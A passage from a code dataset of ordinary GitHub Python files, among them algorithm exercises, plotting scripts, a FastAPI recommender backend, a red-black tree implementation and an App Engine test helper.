  \"\"\"\n    \n    ## find customer with maximum waiting time\n    max_time = 0\n    for customer in customer_list:\n        time = customer[-1]\n        if time > max_time:\n            max_time = time\n    \n    ## define vehicle's vector\n    vehicle = []\n    vehicle.extend(vehicle_position)\n    vehicle.extend(vehicle_position)\n    vehicle.append(max_time)\n    \n    ## calculate distances from vehicle to each customer\n    distances = []\n    vehicle_np = np.array(vehicle)\n    for customer in customer_list:\n        customer_np = np.array(customer)\n        distances.append(np.linalg.norm(vehicle_np - customer_np))\n    \n    idx = np.argsort(distances)\n    idx = idx[0:k]\n    \n    ## list with customers\n    selected_customers = []\n    for i in range(k):\n        selected_customers.append(customer_list[idx[i]])\n    \n    ## customer pool without the selected customers\n    new_pool = list(customer_list)\n    for j in sorted(idx, reverse=True):\n        del new_pool[j]\n    \n    return selected_customers, new_pool\n    \n    \n    \n    \nif __name__ == \"__main__\":\n    \n    customer_pool = [[3,4,5,6,0],\n                     [1,2,7,8,3],\n                     [-1,1,5,5,4],\n                     [-5,-4,3,3,3],\n                     [0,0,9,9,8],\n                     [1,-5,5,-1,7]]\n    \n    get_customers([1,2], customer_pool, 3)","repo_name":"DaniLazaro97/Live-Route-Planning-Optimization-of-the-Night-Ride","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"43555026837","text":"class ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\ndef addTwoNumbers(l1: ListNode, l2: ListNode) -> ListNode:\n    head = ListNode(0)\n    tracker = head\n\n    carry = 0\n\n    while carry or l1 or l2:\n        if l1:\n            carry += l1.val\n            l1 = l1.next\n\n        if l2:\n            carry += l2.val\n            l2 = l2.next\n\n        tracker.next = ListNode(carry % 10)\n        carry //= 10\n        tracker = tracker.next\n\n    return head.next","repo_name":"ozom18/leetcode-mysolution","sub_path":"Add Two Numbers/AddTwoNumbers.py","file_name":"AddTwoNumbers.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"37058214238","text":"# graph: a 2D list holding each node's adjacency information, v: the node to visit, visited: a 1D list marking which nodes have been visited\ndef DFS(graph, v, visited):\n\n    visited[v] = True\n    print(v, end='')\n    # recursively visit the other nodes connected to the current node\n    for i in 
graph[v]:\n        if not visited[i]:\n            DFS(graph, i, visited)\n\n# adjacency information for each node expressed as a list (a 2D list); there is no distance information\ngraph = [\n    [], # starting from node 0\n    [2,3,8],\n    [1,7],\n    [1,4,5],\n    [3,5],\n    [3,4],\n    [7],\n    [2,6,8],\n    [1,7]\n]\n\nvisited = [False] * len(graph)\n\nDFS(graph, 1, visited)","repo_name":"y2336789/python","sub_path":"DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"71229660114","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nx = np.linspace(-2, 2, 1000)\n# the syntax `line_cosh, = ...` unpacks the one-element list returned by plot, assigning the Line2D object itself to line_cosh rather than the list containing it\nline_cosh, = ax.plot(x, np.cosh(x))\nline_quad, = ax.plot(x, x**2 / 2)\nplt.show()\n","repo_name":"BrunoCampana/practicing-scientific-programming-with-python","sub_path":"catenary.py","file_name":"catenary.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"74058289875","text":"'''\nAuthor: Jaime Liew (jyli@dtu.dk)\n\nAnimates the timestep output files of the heat equation solver.\n\nRequirements:\n- numpy\n- matplotlib\n- moviepy\n'''\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\nfrom moviepy.editor import VideoClip\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nimport numpy as np\n\n\ndef make_frame(t):\n    filename = f'diff{make_frame.counter:06d}.dat'\n\n    A = np.loadtxt(filename)\n    x, y, T = A[:, 0].reshape((21, 21)), A[:, 1].reshape(\n        (21, 21)), A[:, 2].reshape((21, 21))\n\n    fig = plt.figure()\n    ax = fig.add_subplot(111, projection='3d')\n    ax.plot_wireframe(x, y, T)\n    ax.set_zlim(0, 1)\n\n    img = mplfig_to_npimage(fig)\n    plt.close(fig)\n\n    make_frame.counter += 1\n    return img\n\n\nmake_frame.counter = 1\n\nif __name__ == '__main__':\n    fps = 20\n    N = 200\n    duration = (N - 1) / fps\n\n    animation = VideoClip(make_frame, duration=duration)\n    animation.write_gif('gif.gif', fps=fps)\n","repo_name":"jaimeliew1/high_performance_computing_course","sub_path":"week1/heat_equation/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"23944001557","text":"\r\n\r\ndef climbingLeaderboard(scores, alice):\r\n\r\n    if not (len(scores) > 0 and len(alice) > 0):\r\n        return []\r\n\r\n    scoreIndex = []\r\n\r\n    previous = scores[0]\r\n    scoreIndex.append(previous)\r\n    tracker = 1\r\n    counter = len(scores)\r\n    for i in range(1, counter):\r\n        elem = scores[i]\r\n\r\n        if elem == previous:\r\n            continue\r\n\r\n        previous = scores[i]\r\n        scoreIndex.append(previous)\r\n        tracker = tracker + 1\r\n\r\n    rank = len(scoreIndex)\r\n    tracker = len(scoreIndex)-1\r\n    aliceRanks = []\r\n    j = 0\r\n    counter = len(alice)\r\n    for i in range(0, counter):\r\n        for j in range(tracker, -1, -1):\r\n            if alice[i] >= scoreIndex[j]:\r\n                rank = rank - 1\r\n                continue\r\n            break\r\n        tracker = rank - 1\r\n        aliceRanks.append(rank + 1)\r\n\r\n    return aliceRanks\r\n\r\nprint(climbingLeaderboard([100, 100, 50, 40, 40, 20, 10],[120, 120, 120, 120]))\r\n#print(climbingLeaderboard([100, 100, 50, 40, 40, 20, 10],[5, 25, 50, 
120]))\r\n","repo_name":"nikhillahoti/HackerRank-Solutions","sub_path":"ClimbingTheLeaderboard.py","file_name":"ClimbingTheLeaderboard.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"4866766274","text":"import json\n\ndef swap(lst, x, y):\n global swap1, swap2\n swap1 = x\n swap2 = y\n\n lst[x], lst[y] = lst[y], lst[x]\n\n\ndef partition(arr, start, end):\n global i\n global pivotind\n\n pivotind = end\n pivot = arr[pivotind]\n i = start - 1\n\n for j in range(start, end):\n if letterwaarde(arr[j], pivot):\n i += 1\n swap(arr, i, j)\n\n swap(arr, i + 1, end)\n return i + 1\n\n\ndef quicksort(arr, start, end):\n if len(arr) == 1:\n return\n\n if end > start:\n pivot = partition(arr, start, end)\n\n quicksort(arr, start, pivot - 1)\n quicksort(arr, pivot + 1, end)\n\n\ndef letterwaarde(woord1, woord2):\n alphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\",\n \"v\", \"w\", \"x\", \"y\", \"z\", ]\n woord1 = woord1.lower()\n woord2 = woord2.lower()\n\n if len(woord1) == 0 or len(woord2) == 0:\n return True\n\n if woord1.lower() == woord2.lower():\n return True\n\n i = 0\n for letter in woord1.lower():\n if letter not in alphabet:\n continue\n\n while woord2[i] not in alphabet:\n if len(woord2[i:]) == 1:\n return False\n i += 1\n\n if alphabet.index(letter) < alphabet.index(woord2[i]):\n return True\n\n if alphabet.index(letter) == alphabet.index(woord2[i]):\n return letterwaarde(woord1[1:], woord2[1:])\n\n return False\n\n\ndef quicksortcaller(arr):\n quicksort(arr, 0, len(arr) - 1)\n\n\ndef allgameslength():\n with open(\"sortedgames.txt\", \"r\") as f:\n return len(f.readlines())\n\ndef hatedgame():\n max = [0, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n if game['negative_ratings'] > max[0]:\n max[0] = game['negative_ratings']\n max[1] = game['name']\n\n return max\n\n\ndef lovedgame():\n max = [0, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n if game['positive_ratings'] > max[0]:\n max[0] = game['positive_ratings']\n max[1] = game['name']\n\n return max\n\n\ndef mostplayedgame():\n played = [0, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n owners = game[\"owners\"].split(\"-\")\n owners = int(owners[1]) + int(owners[0]) / 2\n playtime = int(game['average_playtime'])\n if playtime * owners > played[0]:\n played[0] = int(playtime * owners)\n played[1] = game['name']\n\n return played\n\n\ndef leastplayedgame():\n played = [99999999, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n owners = game[\"owners\"].split(\"-\")\n owners = int(owners[1]) + int(owners[0]) / 2\n playtime = int(game['average_playtime'])\n if playtime * owners < played[0]:\n played[0] = int(playtime * owners)\n played[1] = game['name']\n\n return played\n\n\ndef mostexpensivegame():\n max = [0, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n if game['price'] > max[0]:\n max[0] = game['price']\n max[1] = game['name']\n\n return 
max","repo_name":"Project-Steam/Project-Steam","sub_path":"Project_Steam/AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"42211337030","text":"# -*- coding: utf-8 -*-\n\ndef main():\n cartas = []\n carta = input()\n \n cartas = carta.split()\n \n a = cartas[0]\n b = cartas[1]\n \n if int(a) > int(b):\n print(\"{}\".format(a))\n \n else:\n print(\"{}\".format(b))\n \nif __name__ == '__main__':\n main()","repo_name":"julianamarques/URI-Online-Judge","sub_path":"URI_1933 - (6570985) - Accepted.py","file_name":"URI_1933 - (6570985) - Accepted.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"2387059870","text":"\"\"\"\nThis is the main file for the FastAPI backend. All the services that the frontend calls to request\ndata will be defined here.\n\nI have created a few separate python modules in this folder that are imported here, mostly just to \nkeep this file clean. The only definitions here are for the main process (the `app` variable) and \nits endpoints. However, this is totally subjective and can be changed.\n\"\"\"\n\nimport numpy as np\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nimport app.src.utils as utils\nimport app.src.request_formats as requests\nimport app.src.response_formats as responses\nfrom app.src.model import WorldsWorstMovieRecommender\n\n\n# frontend is also running on localhost, but from port 3000\nFRONTEND_PORT = 3000\nFRONTEND_HOST = \"localhost\"\n\n# only localhost connections can make requests to the backend for security\nALLOWED_ORIGINS = [\n f\"http://{FRONTEND_HOST}:{FRONTEND_PORT}\",\n f\"{FRONTEND_HOST}:{FRONTEND_PORT}\"\n]\n\n\nstupid_model = WorldsWorstMovieRecommender()\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=ALLOWED_ORIGINS,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\n@app.get(\"/echo/{input}\")\nasync def echo(input):\n \"\"\"\n A basic test endpoint that returns the param passed in the URL\n \"\"\"\n return {\"echo\": input}\n\n@app.post(\"/recommend\")\nasync def make_recommendation(userdata: requests.UserData) -> responses.Recommendation:\n \"\"\"\n A temporary endpoint showing how the backend might use a model to process user data, then\n return a prediction.\n\n With POST requests like this one, the request body from the frontend must include all the \n information defined in the UserData class. 
See the `request_formats.py` file for an idea\n of how we can define these custom request formats.\n \"\"\"\n input = utils.convert_userdata_to_model_input(userdata)\n predictions = stupid_model.predict(input)\n\n # see docstring for WorldsWorstMovieRecommender.predict for how this works\n best_recommendation_movie_id = int(np.argmax(predictions))\n\n return utils.convert_movie_id_to_recommendation(best_recommendation_movie_id)\n\n","repo_name":"StevePic95/movie-rec","sub_path":"backend/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7789723037","text":"\n\"\"\"\nA red–black tree is a specialised binary search tree data structure noted for fast storage\nand retrieval of ordered information, and a guarantee that operations will complete within a known time.\nCompared to other self-balancing binary search trees, the nodes in a red-black tree hold an extra bit called\n\"color\" representing \"red\" and \"black\" which is used when re-organising the tree to ensure that it is always approximately balanced.\n\nInsertion and deletion of an element both have logarithmic time complexity.\n\nA valid Red-Black Tree T has 5 properties:\n\n1) Every node in T is either red or black.\n2) The root node of T is black.\n3) Every NULL node is black\n4) If a node is red, both of its children are black.\n5) Every path from a root node to a NULL node has the same number of black nodes.\n\"\"\"\n\n\n\nimport sys\n\n\"\"\"\nData structure that represents a node in the tree\n\"\"\"\nclass Node():\n def __init__(self, data):\n self.data = data # holds the key\n self.parent = None #pointer to the parent\n self.left = None # pointer to left child\n self.right = None #pointer to right child\n self.color = 1 # 1 . Red, 0 . 
Black\n\n\n\"\"\"\nclass RedBlackTree implements the operations in Red Black Tree\n\"\"\"\nclass RedBlackTree():\n    def __init__(self):\n        self.TNULL = Node(0)\n        self.TNULL.color = 0\n        self.TNULL.left = None\n        self.TNULL.right = None\n        self.root = self.TNULL\n\n\n\n    \"\"\"\n    Search a node in the tree - O(logN)\n    \"\"\"\n    def __search_tree_helper(self, node, key):\n        if node == self.TNULL or key == node.data:\n            return node\n\n        if key < node.data:\n            return self.__search_tree_helper(node.left, key)\n        return self.__search_tree_helper(node.right, key)\n\n\n    \"\"\"\n    Fix the RB tree modified by the delete operation\n    \"\"\"\n    def __fix_delete(self, x):\n        while x != self.root and x.color == 0:\n            if x == x.parent.left:\n                s = x.parent.right\n                if s.color == 1:\n                    # case 3.1\n                    s.color = 0\n                    x.parent.color = 1\n                    self.__left_rotate(x.parent)\n                    s = x.parent.right\n\n                if s.left.color == 0 and s.right.color == 0:\n                    # case 3.2\n                    s.color = 1\n                    x = x.parent\n                else:\n                    if s.right.color == 0:\n                        # case 3.3\n                        s.left.color = 0\n                        s.color = 1\n                        self.__right_rotate(s)\n                        s = x.parent.right\n\n                    # case 3.4\n                    s.color = x.parent.color\n                    x.parent.color = 0\n                    s.right.color = 0\n                    self.__left_rotate(x.parent)\n                    x = self.root\n            else:\n                s = x.parent.left\n                if s.color == 1:\n                    # case 3.1\n                    s.color = 0\n                    x.parent.color = 1\n                    self.__right_rotate(x.parent)\n                    s = x.parent.left\n\n                if s.left.color == 0 and s.right.color == 0:\n                    # case 3.2\n                    s.color = 1\n                    x = x.parent\n                else:\n                    if s.left.color == 0:\n                        # case 3.3\n                        s.right.color = 0\n                        s.color = 1\n                        self.__left_rotate(s)\n                        s = x.parent.left\n\n                    # case 3.4\n                    s.color = x.parent.color\n                    x.parent.color = 0\n                    s.left.color = 0\n                    self.__right_rotate(x.parent)\n                    x = self.root\n        x.color = 0\n\n    def __rb_transplant(self, u, v):\n        if u.parent == None:\n            self.root = v\n        elif u == u.parent.left:\n            u.parent.left = v\n        else:\n            u.parent.right = v\n        v.parent = u.parent\n\n\n    \"\"\"\n    Delete the node from the tree - O(logN)\n    \"\"\"\n    def __delete_node_helper(self, node, key):\n        # find the node containing key\n        z = self.TNULL\n        while node != self.TNULL:\n            if node.data == key:\n                z = node\n\n            if node.data <= key:\n                node = node.right\n            else:\n                node = node.left\n\n        if z == self.TNULL:\n            print(\"Couldn't find key in the tree\")\n            return\n\n        y = z\n        y_original_color = y.color\n        if z.left == self.TNULL:\n            x = z.right\n            self.__rb_transplant(z, z.right)\n        elif z.right == self.TNULL:\n            x = z.left\n            self.__rb_transplant(z, z.left)\n        else:\n            y = self.minimum(z.right)\n            y_original_color = y.color\n            x = y.right\n            if y.parent == z:\n                x.parent = y\n            else:\n                self.__rb_transplant(y, y.right)\n                y.right = z.right\n                y.right.parent = y\n\n            self.__rb_transplant(z, y)\n            y.left = z.left\n            y.left.parent = y\n            y.color = z.color\n        if y_original_color == 0:\n            self.__fix_delete(x)\n\n    \"\"\"\n    Fix the RB tree modified by the insert operation - O(logN)\n    \"\"\"\n    def __fix_insert(self, k):\n        while k.parent.color == 1:\n            if k.parent == k.parent.parent.right:\n                u = k.parent.parent.left # uncle\n                if u.color == 1:\n                    # case 3.1\n                    u.color = 0\n                    k.parent.color = 0\n                    k.parent.parent.color = 1\n                    k = k.parent.parent\n                else:\n                    if k == k.parent.left:\n                        # case 3.2.2\n                        k = k.parent\n                        self.__right_rotate(k)\n                    # case 3.2.1\n                    k.parent.color = 0\n                    k.parent.parent.color = 1\n                    self.__left_rotate(k.parent.parent)\n            else:\n                u = k.parent.parent.right # uncle\n\n                if u.color == 1:\n                    # mirror case 3.1\n                    u.color = 0\n                    k.parent.color = 0\n                    k.parent.parent.color = 1\n                    k = k.parent.parent\n                else:\n                    if k == k.parent.right:\n                        # mirror case 3.2.2\n                        k = k.parent\n                        
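# left-rotate so that the recoloring of mirror case 3.2.1 applies\n                        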
self.__left_rotate(k)\n # mirror case 3.2.1\n k.parent.color = 0\n k.parent.parent.color = 1\n self.__right_rotate(k.parent.parent)\n if k == self.root:\n break\n self.root.color = 0\n\n\n \"\"\"\n Print the Tree structure on the screen - O(N)\n \"\"\"\n def __print_helper(self, node, indent, last):\n\n if node != self.TNULL:\n sys.stdout.write(indent)\n if last:\n sys.stdout.write(\"R----\")\n indent += \" \"\n else:\n sys.stdout.write(\"L----\")\n indent += \"| \"\n\n s_color = \"RED\" if node.color == 1 else \"BLACK\"\n print (str(node.data) + \"(\" + s_color + \")\")\n self.__print_helper(node.left, indent, False)\n self.__print_helper(node.right, indent, True)\n\n\n \"\"\"\n Search the tree for the key k and return the corresponding node - O(logN)\n \"\"\"\n def searchTree(self, k):\n return self.__search_tree_helper(self.root, k)\n\n\n\n \"\"\"\n Find the node with the minimum key - O(logN)\n \"\"\"\n def minimum(self, node):\n while node.left != self.TNULL:\n node = node.left\n return node\n\n\n \"\"\"\n Find the node with the maximum key - O(logN)\n \"\"\"\n def maximum(self, node):\n while node.right != self.TNULL:\n node = node.right\n return node\n\n\n \"\"\"\n Rotate left at node x - O(1)\n \"\"\"\n def __left_rotate(self, x):\n y = x.right\n x.right = y.left\n if y.left != self.TNULL:\n y.left.parent = x\n\n y.parent = x.parent\n if x.parent == None:\n self.root = y\n elif x == x.parent.left:\n x.parent.left = y\n else:\n x.parent.right = y\n y.left = x\n x.parent = y\n\n \"\"\"\n Rotate right at node x - O(1)\n \"\"\"\n def __right_rotate(self, x):\n y = x.left\n x.left = y.right\n if y.right != self.TNULL:\n y.right.parent = x\n\n y.parent = x.parent\n if x.parent == None:\n self.root = y\n elif x == x.parent.right:\n x.parent.right = y\n else:\n x.parent.left = y\n y.right = x\n x.parent = y\n\n\n\n \"\"\"\n Insert the key to the tree in its appropriate position and fix the tree - O(logN)\n \"\"\"\n def insert(self, key):\n # Ordinary Binary Search Insertion\n node = Node(key)\n node.parent = None\n node.data = key\n node.left = self.TNULL\n node.right = self.TNULL\n node.color = 1 # new node must be red\n\n y = None\n x = self.root\n\n while x != self.TNULL:\n y = x\n if node.data < x.data:\n x = x.left\n else:\n x = x.right\n\n # y is parent of x\n node.parent = y\n if y == None:\n self.root = node\n elif node.data < y.data:\n y.left = node\n else:\n y.right = node\n\n # if new node is a root node, simply return\n if node.parent == None:\n node.color = 0\n return\n\n # if the grandparent is None, simply return\n if node.parent.parent == None:\n return\n\n # Fix the tree\n self.__fix_insert(node)\n\n \"\"\"\n Return the root of the tree - O(1)\n \"\"\"\n def get_root(self):\n return self.root\n\n \"\"\"\n Delete the node from the tree, calling helper\n \"\"\"\n def delete_node(self, key):\n self.__delete_node_helper(self.root, key)\n\n\n \"\"\"\n Print the tree structure on the screen, calling helper\n \"\"\"\n def pretty_print(self):\n self.__print_helper(self.root, \"\", True)\n\nif __name__ == \"__main__\":\n bst = RedBlackTree()\n bst.insert(8)\n bst.insert(18)\n bst.insert(5)\n bst.insert(15)\n bst.insert(17)\n bst.insert(25)\n bst.insert(40)\n bst.insert(80)\n bst.delete_node(25)\n bst.pretty_print()\n","repo_name":"LeoPag/Data-Structures","sub_path":"Red Black Tree/red_black_tree.py","file_name":"red_black_tree.py","file_ext":"py","file_size_in_byte":10595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} 
+{"seq_id":"30954555742","text":"from django import urls\nfrom django.urls import URLPattern, path\nfrom product import views\n\n\nurlpatterns = [\n path(\"\",views.book),\n \n path('cart/add//', views.cart_add, name='cart_add'),\n path('cart/item_clear//', views.item_clear, name='item_clear'),\n path('cart/item_increment//',\n views.item_increment, name='item_increment'),\n path('cart/item_decrement//',\n views.item_decrement, name='item_decrement'),\n path('cart/cart_clear/', views.cart_clear, name='cart_clear'),\n path('cart/cart-detail/',views.cart_detail,name='cart_detail'),\n path(\"order/\",views.order),\n\n\n\n path('checkout/',views.checkout)\n \n]\n\n\n\n\n","repo_name":"Karma2021/Individual_Project","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"40187765699","text":"from cs50 import get_float\n\n# Check input\nwhile True:\n change = get_float(\"Change owed: \")\n if change >= 0:\n break\n\n# Convert to cents\ncents = round(change, 2) * 100\n\n# Find components\nquarters = int(cents / 25)\ndimes = int((cents % 25) / 10)\nnickles = int(((cents % 25) % 10) / 5)\npennies = int(((cents % 25) % 10) % 5)\n\n# Print result\nprint(quarters + dimes + nickles + pennies)","repo_name":"shdev2018/ProblemSets","sub_path":"cash/cash.py","file_name":"cash.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"23942088767","text":"\"\"\"\n Pandas Part-II\n\"\"\"\n\nimport pandas as pd\n\nteams = [\n \"Rajasthan Royals\",\n \"Delhi Capitals\",\n \"Chennai Super Kings\",\n \"Mumbai Indians\",\n \"Delhi Capitals\",\n \"Kolkata Knight Riders\",\n \"Chennai Super Kings\",\n \"Deccan Chargers\",\n \"Kings XI Punjab\",\n \"Mumbai Indias\"\n]\n\nranks = [2, 3, 4, 1, 3, 4, 1, 2, 5, 4]\nyears = [2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019]\n\nipl_data_set = {\n \"teams\": teams,\n \"ranks\": ranks,\n \"years\": years\n}\n\nprint(ipl_data_set)\n# Assignment: Web-scarap the above data set :)\n\nprint()\n\ndata_set = pd.DataFrame(ipl_data_set)\nprint(data_set)\n\nprint()\n\ngrouped_data_set = data_set.groupby('ranks')\n# print(grouped_data_set)\nprint(grouped_data_set.groups)\n\nprint()\n\ngrouped_data_set = data_set.groupby(['teams', 'ranks'])\nprint(grouped_data_set.groups)\n\nprint()\n\nprint(\"****Iterating In Group****\")\nfor team_name, grp in grouped_data_set:\n print(grp)\n print(team_name)\n print(\"-------------------------------\")\n\n\nprint(\"****Fetching Single Group****\")\nprint(grouped_data_set.get_group(\"Mumbai Indias\"))\n# Please read the thread and see if we have done something wrong: https://github.com/pandas-dev/pandas/issues/8121\n","repo_name":"ishantk/GW2020P1","sub_path":"Session30.py","file_name":"Session30.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"73"} +{"seq_id":"24603236967","text":"\"\"\"\nWord alignment using awesome-align: https://github.com/neulab/awesome-align\nPrepare src-tgt to the correct format\n\"Inputs should be *tokenized* and each line is a source language sentence and its target language translation,\nseparated by (`|||`)\"\n\"\"\"\n\nimport argparse\nfrom utils import str_to_bool\nfrom read_and_analyse_df import read_output_df\n\n\ndef main():\n parser = argparse.ArgumentParser()\n 
parser.add_argument('--df_root_path', type=str)\n    parser.add_argument('--data_root_path', type=str, default='data')\n    parser.add_argument('--src_lang', type=str, default=\"en\")\n    parser.add_argument('--tgt_lang', type=str, default=\"de\")\n    parser.add_argument('--replacement_strategy', type=str, default='word2vec_similarity',\n                        help='[word2vec_similarity|masking_language_model]. The latter option is context-based.')\n    parser.add_argument('--number_of_replacement', type=int, default=5,\n                        help='The number of replacements for 1 SRC word')\n    parser.add_argument('--dataname', type=str)\n    parser.add_argument('--seed', type=int, default=0)\n    parser.add_argument('--beam', type=int, default=5)\n    parser.add_argument('--mask_type', type=str)\n    parser.add_argument('--winoMT', type=str_to_bool, default=False)\n\n    args = parser.parse_args()\n    print(args)\n\n    if args.winoMT:\n        args.mask_type = 'pronoun'\n        args.number_of_replacement = 1\n\n    # Output the reformatted src-trans file to be used for awesome align\n    read_output_df(df_root_path=args.df_root_path, data_root_path=args.data_root_path,\n                   dataset=f\"{args.dataname}_{args.src_lang}2{args.tgt_lang}\",\n                   src_lang=args.src_lang, tgt_lang=args.tgt_lang, mask_type=args.mask_type,\n                   beam=args.beam, replacement_strategy=args.replacement_strategy, ignore_case=False,\n                   no_of_replacements=args.number_of_replacement, winoMT=args.winoMT,\n                   tokenize_sentences=True, reformat_for_src_tgt_alignment=True)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"TuAnh23/Perturbation-basedQE","sub_path":"src_tgt_alignment.py","file_name":"src_tgt_alignment.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"28278430635","text":"\"\"\"\n    Test Helper\n\"\"\"\nfrom unittest import TestCase\nfrom unittest import skip # As convenience for test modules.\nfrom os.path import abspath, dirname, join\nimport hashlib\nimport email\nimport re\nfrom bs4 import BeautifulSoup\nfrom urlparse import urlparse\n\nfrom google.appengine.ext import ndb, testbed\nfrom google.appengine.api.mail import InboundEmailMessage\n\nfrom controllers import app\nimport config\n\n\n#\n# Constants\n#\n# See http://stackoverflow.com/a/9065860/1093087\nXHR_HEADERS = [('X-Requested-With', 'XMLHttpRequest')]\n\n\n#\n# Base Test Classes\n#\nclass AppEngineTestCase(TestCase):\n    \"\"\"Basic test case setup. 
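A fresh testbed is activated in setUp and deactivated in tearDown. 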
This doesn't provide any patches or optimizations.\n    It can be used as a baseline for comparing other base classes below.\n    \"\"\"\n    def setUp(self, **options):\n        app.config['TESTING'] = True\n        self.longMessage = True\n        self.testbed = make_bed(**options)\n\n        # Optional mock csrf token: Default = True\n        # WTF_CSRF_ENABLED: circumvents WTForm CSRF protection\n        # ACCEPT_MOCK_CSRF_TOKEN: circumvents check_csrf filter\n        if options.get('mock_csrf_token', True):\n            app.config['WTF_CSRF_ENABLED'] = False\n            app.config['ACCEPT_MOCK_CSRF_TOKEN'] = True\n\n    def tearDown(self):\n        self.testbed.deactivate()\n\n    def initTaskQueueStub(self):\n        self.testbed.init_taskqueue_stub(root_path=project_root())\n        self.taskqueue_stub = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)\n\n    def initMailStub(self):\n        self.testbed.init_mail_stub()\n        self.mail_stub = self.testbed.get_stub(testbed.MAIL_SERVICE_NAME)\n        return self.mail_stub\n\n    def initAppContext(self):\n        \"\"\"For cases where a Flask context may be needed for a unit test.\n        \"\"\"\n        from controllers import app\n        return app.app_context\n\nclass AppEngineModelTest(AppEngineTestCase):\n    \"\"\"Using this class with counter patch speeds up tests. See models/test_prediction.py\n    for an example of usage.\n    \"\"\"\n    def setUp(self, **options):\n        # the parent setUp already sets longMessage and activates a single testbed;\n        # activating a second one here would leak it\n        super(AppEngineModelTest, self).setUp(**options)\n\n    def tearDown(self):\n        self.testbed.deactivate()\n\nclass AppEngineControllerTest(AppEngineModelTest):\n    \"\"\"Similar to Model test except it inits user stub by default.\n    \"\"\"\n    def setUp(self, **options):\n        options['init_user_stub'] = options.get('init_user_stub', True)\n        options['init_taskqueue_stub'] = options.get('init_taskqueue_stub', True)\n        super(AppEngineControllerTest, self).setUp(**options)\n\n\ndef make_bed(**options):\n    # Initializing the datastore stub with root_path enables tests to generate\n    # index.yaml file. See http://stackoverflow.com/q/24702001/1093087.\n    bed = testbed.Testbed()\n    bed.activate()\n    bed.init_datastore_v3_stub(root_path=project_root())\n    bed.init_memcache_stub()\n\n    # Optional user stub setup: Default = False. 
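Pass init_user_stub=True to enable. 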
Note: MockIdentityService will\n # stub this.\n if options.get('init_user_stub'):\n bed.init_user_stub()\n\n # Optional task queue setup: Default = False\n if options.get('init_taskqueue_stub', False):\n bed.init_taskqueue_stub(root_path=project_root())\n bed.taskqueue_stub = bed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)\n\n # Optional mail stub setup: Default = False\n if options.get('init_mail_stub', False):\n bed.init_mail_stub()\n bed.mail_stub = bed.get_stub(testbed.MAIL_SERVICE_NAME)\n\n # Clear cache\n ndb.get_context().clear_cache()\n\n return bed\n\n\n#\n# Helper Methods\n#\nproject_root = lambda: abspath(join(dirname(__file__), '..'))\n\ndef parse_html(markup):\n # Returns\n html = BeautifulSoup(markup, 'html.parser')\n return html\n\ndef redirect_path(response):\n if not response.location:\n return None\n else:\n return urlparse(response.location).path\n\ndef extract_id_from_url(url):\n if url is None:\n return None\n else:\n return int(re.search('\\d+', url).group())\n\n\n#\n# Helper Classes and Fixtures\n#\nclass TestEmail(object):\n @staticmethod\n def fixture(**options):\n # Default Options\n fixture_name = options.get('fixture', 'recruiter_email')\n sender = options.get('sender', 'sender@email.com')\n recipient = options.get('recipient', 'recipient@foo.appspotmail.com')\n recruiter_name = options.get('recruiter_name', 'Harold Kumar')\n recruiter_email = options.get('recruiter_email', 